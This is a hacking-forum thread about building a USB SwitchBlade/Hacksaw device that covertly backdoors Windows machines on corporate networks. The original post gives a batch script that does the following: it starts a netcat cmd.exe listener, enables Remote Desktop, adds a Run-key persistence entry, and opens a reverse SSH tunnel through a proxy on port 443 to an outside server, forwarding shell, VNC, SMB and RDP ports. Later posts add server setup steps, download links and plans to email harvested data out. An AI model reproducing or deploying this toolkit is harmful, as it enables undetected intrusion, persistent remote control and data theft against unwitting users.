USB Hacksaw/SwitchBlade for the corporate network

[greypwny]

With all the talk that has been going on of late on hxxp: wiki. hak5. org/wiki//USB_Switchblade.  I decided to put one together based on the GonZor SwitchBlade but with a couple of modifications.

This device was to be used/tested in a corporate environment which used authenticated web proxies and there were some unathenticated proxies and with no access to external smtp servers.  So using things like VNC and net cat would be useless unless the attacker were sitting on the same network.  The other problem was the user had personal firewalls enabled.

So we needed to devise a plan where all bindings for networks were made to localhost.  Communications could only be established if:

    * we could find and connect to an unauthenticated proxy

    * outgoing port would need to be 443

    * the traffic would need to be encrypted

    * locate an internal smtp server for the hacksaw component

Solutions

    * A wget on the proxy. pac file and search for the word Unauthenticated and an regex that looked like an  (WORK IN PROGRESS)

    * netcat running in listen mode

    * an SSH server listening on port 443 with a username that can only connect to a chrooted jail or at worst to a restricted shell

    * the ssh certificate already on the USB key

    * a piece of software called connect. exe to facilitate the connect method

    * openssh on the usb key

This worked to punch a undetected hole out to real world and with an effective reverse ssh session we now have access to netcat for shell commands, VNC and RDESKTOP to take control of the machine and attempting to map smb ports to higher ports for network connectivity.

Below is an extract from my go. bat file that facilitates this

REM - go. bat ssh file

@echo on

cd SystemSRC >NUL

REM . nircmd. exe execmd . nc -L -p 52323 -d -e cmd. exe    REM netcat running in listen mode on port 52323 running from USB key not good for the "thumb suck method"

md "%systemroot%ssh"                                              REM create directory for SSH

xcopy ". ssh*. *" "%systemroot%"ssh /c /e /y              REM copy ssh components (cut down from openssh)

cd

md c:bin                                                                  REM this needs to be made dynamic but hey I'm lazy

xcopy "bin*. *" "c:bin" /c /e /y                                REM copy bin components of SSH (probably a better way to do this but hey it works)

c:

cd "%systemroot%ssh"

nircmd. exe execmd nc -L -p 52323 -d -e cmd. exe        REM Netcat running in listen mode from the computer rather then the usb key

REG ADD "HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolterminal server /f /v fDenyTSConnections /t REG_DWORD /d 0" / f 

                                                                                REM Enable remote desktop

REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /f /v PWN /t REG_SZ /d "%systemroot%sshssh. lnk" /f

                                                                                REM enable this process to begin on startup

ssh -F ssh_config hacksaw@domain. com:443 -i ssh. key -R 52323:localhost:52323 -R 5900:localhost:5900 -R 5800:localhost:5800 -R 52324:localhost:445 -R 3389:localhost:3389 -vvv -C

                                                                                REM SSH session to the server

Extract from the config file

# This is ssh client systemwide configuration file.  This file provides

# defaults for users, and the values can be changed in per-user configuration

# files or on the command line.

StrictHostKeyChecking no

ProxyCommand "c:windowssshconnect. exe" -H IPADDRESS:PORT %h %p  #using the connect method to get out to the web

This process doesn't require the user to be a local administrator and will run every time the user starts the system.  Even if they are on a non split tunnel VPN connection.  There are still a couple of steps to work out how to do.

I still haven't had time to write the script that gets the IP of the unauthenticated proxy, or how to bind with outlook or other email client to send the results of the hacksaw to an email address.

Thoughts on the proxy are

run proxycfg -u from command prompt if there is a pac file found do a wget and then search for the words unauthenticated then grep on the IP address and set as variable.

Please offer comments or post questions to help with this approach.

[USBHacker]

Can I have the real thing?

Can you give it to me, like in a zip or something?

[catinthebox]

yeah, send send send, i wanna mod it and post some stuff

[greypwny]

I will post it shortly as I need to make sure there is nothing in there that ties it back to me personally  :?

Should be up in the next day or so.

[USBHacker]

^Okay!

Thanks!

[Guest MaxDamage]

xxx

[greypwny]

We created a limited shell for this user to stop people using it for bad things, scp, etc.

#!/bin/bash

while [ 1 ]; do

echo Greetings

        sleep 60

done

This seemed to be enough to keep the session alive.

Is it your proxy that is terminating the session?

I'm having some trouble in finding a site to upload the zip of my u3custom to. Does anyone have some hosting to allow me to do this or a recommendation of where to host said file?

[greypwny]

Well finally i have had some time to put this together, below is a zip file of my U3custom folder.

http://www.box.net/shared/6bm6ruod1d

Now before this will work you need to configure a couple of things

First things first you need to create a ssh account etc on your "server" the following instructions are HOW TO for OpenSSH public key authentication

1) Create a RSA ssh key pair with an empty pass phrase

$ ssh-keygen

  Generating public/private rsa key pair.

  Enter file in which to save the key (/home/someuser/.ssh/id_rsa): /home/someuser/.ssh/secuser_id_rsa

  Enter passphrase (empty for no passphrase): [enter]

  Enter same passphrase again: [enter]

  Your identification has been saved in /home/someuser/.ssh/secuser_id_rsa.

  Your public key has been saved in /home/someuser/.ssh/secuser_id_rsa.pub.

  The key fingerprint is:

  8d:ef:b0:0f:9e:b5:cb:bd:4d:e3:12:da:a6:dc:3a:84 user@host

$ cat /home/someuser/.ssh/secuser_id_rsa

Note: This is the ssh private key you just created.  This is the key that gets saved on the USB drive.

$ cat /home/someuser/.ssh/secuser_id_rsa.pub

Note: This is the ssh public key you just created.  Copy this for step 3 later.

2) Create a user on the system that you want the victim PC to login to.

$sudo useradd [uSERNAME] -c "Hacksaw test user" -d /home/[uSERNAME] -m

Note: For the newbies replace the [uSERNAME] with an actual username like HACKSAW or something like that

3) Setup ssh public key auth for this user

$ sudo su - [uSERNAME] -c 'mkdir ~/.ssh'

$ sudo su - [uSERNAME] -c 'chmod 755 ~/.ssh'

$ sudo su - [uSERNAME] -c 'cat > ~/.ssh/authorized_keys2'

  [paste your public key from step 1]

[CTRL-D]

$ sudo su - [uSERNAME] -c 'chmod 600 ~/.ssh/authorized_keys2'

4) Test it out

$ ssh -l secuser -i /home/someuser/.ssh/secuser_id_rsa localhost

  8<--snip usual login guff

$ id

  uid=1001(secuser) gid=1002(secuser) groups=1002(secuser)

Note:  /home/someuser/.ssh/secuser_id_rsa is the path and filename for the private key you created in step 1.

Note:  If this fails for any reason, re-run the ssh command with “-vvv” for very very verbose output and look for the reason it fails.

5) Create a limited shell for this user to stop people using it for bad things, scp, etc.

Create a shell file with the following in it using which ever text editor you like, call it hacksawshell.sh and save it to /usr/local/bin/

#!/bin/bash

while [ 1 ]; do

echo Greetings

        sleep 60

done

[CTRL-D]

$ sudo chmod 755 /usr/local/bin/hacksawshell.sh

$ sudo chsh -s /usr/local/bin/hacksawshell.sh [uSERNAME]

Note:  make sure you test this, and make sure the [username] cannot get a normal shell, or use scp/sftp/etc.

$ssh -l [username] -i /home/[usernaccount]/.ssh/[username]_id_rsa localhost

Last login: Thu Oct 26 16:46:33 2007 from localhost

Greetings

So now you have setup the server and hopefully by the time you have done this the file mentioned above has downloaded.

6) Unzip the file on your machine and move the contents to your u3custome folder

if you haven't already read the above, this is all based on the GONZOR switch blade go to http://www.users.on.net/~simmo_89/switchblade/Index.html to download his original files and replace his u3custom folder with mine

7) Now it is time to edit a couple of files

Edit the the go.bat found in the u3customsystemsrcssh folder

Now in the last line put in the details of your ssh server

Copy those details you have added and put it in go2.bat and go3.bat found in the aforementioned folder

edit u3customsystemsrcsshssh_config file and the proxy details to be used

8 ) Adding your ssh private key

In the u3customsystemsrcssh  there is a file called ssh.key please copy your private key created in step one into this folder

9) Sendmail options

I know there is gui that was created for this but i found it didn't do some of the things I wanted to do so yet again edit

u3customsystemsend.bat

add your mailserver (smtp) and of course the port number this in the line that begins with "for"

And please set the variables for emailfrom, emailto, password etc

10) and we are almost done

I have also updated the antidote file that will hopefully kill and remove things, yet again this is built on GONZOR's.

http://www.box.net/shared/46rrt9plir

11) Create the key

Run the isocreate.cmd as per the GONZOR instructions and then of course the Universal_customizer.exe file

Once this is done open the executable SBCONFIG-Vxxxx.exe and make sure all items are checked.

Save your config and your done.

I hope i haven't missed any steps in putting this together and if I have then please let me know.

Things to note

This does not grab the settings from the user regarding the proxy details this is something (as per step 7) I'm still working on and I' hope you can help me out. As mentioned not sure what is the best way to go whether i need to run a proxycfg -u command and grab those details and add it to the ssh_config file.

Thoughts and ideas welcome.

Remember it is rude not to share :)

[USBHacker]

Can you make a non-u3 version of it?

[Joerg]

Why don't you do it youself?

[GonZor]

Why don't you do it youself?

A - He can't

B - He doesn't want to learn how to

C - He likes annoying us

[greypwny]

Can you make a non-u3 version of it?

I think there are enough guides out there that encapsulate what you are trying to do.

Why don't you errr, ummm use your noodle and work it out, we all had to!

[USBHacker]

^

..unless the drive is manufactured as a U3 drive, it *cannot* be used as one. If the hardware isn't present then it simply can't work.

[SomeoneE1se]

^

..unless the drive is manufactured as a U3 drive, it *cannot* be used as one. If the hardware isn't present then it simply can't work.

the payload work the same on a non u3 n00b you just need to find a different way to auto-run it

[USBHacker]

^FU

Be polite

Or at least don't be rude.

[moonlit]

^FU

Be polite

Or at least don't be rude.

You're dangerously close to a ban, I suggest you take your own advice and "Be polite" yourself.

[VaKo]

^FU

Be polite

Or at least don't be rude.

your banned